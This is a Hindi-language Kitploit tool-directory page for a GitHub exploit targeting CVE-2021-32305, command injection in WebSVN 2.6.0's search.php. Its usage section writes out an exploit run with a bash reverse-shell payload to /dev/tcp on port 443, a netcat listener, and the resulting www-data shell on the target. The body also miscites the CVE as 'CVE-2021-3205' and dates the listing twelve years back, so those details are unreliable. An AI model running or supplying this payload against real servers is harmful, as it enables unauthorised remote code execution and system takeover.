Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-32305-websvn-2.6.0 — यह CVE-2021-32305 का एक एक्सप्लॉइट है, जो search.php पथ पर कमांड इंजेक्शन के लिए एक वेब भेद्यता है, यह एक्सप्लॉइट कमांड निष्पादित करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/fredbrave/cve-2021-32305-websvn-2.6.0
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubfredbrave/cve-2021-32305-websvn-2.6.0

CVE-2021-32305-websvn-2.6.0

यह CVE-2021-32305 का एक एक्सप्लॉइट है, जो search.php पथ पर कमांड इंजेक्शन के लिए एक वेब भेद्यता है, यह एक्सप्लॉइट कमांड निष्पादित करने की अनुमति देता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
12 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-3205-websvn-2.6.0

यह CVE-2021-3205 का एक शोषण है, जो search.php पथ पर कमांड इंजेक्शन की एक वेब भेद्यता है, यह शोषण कमांड निष्पादित करने की अनुमति देता है।

आवश्यकताएँ

optparse, signal, requests

उपयोग

root@kitploit:~
❯ python3 CVE-2021-3205.py --url http://10.0.2.168/websvn/ --payload "bash -c 'bash -i >& /dev/tcp/10.0.2.133/443 0>&1'"

...

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.168] 34174
bash: cannot set terminal process group (357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@agent:~/html/websvn$ 


टूल डाउनलोड करें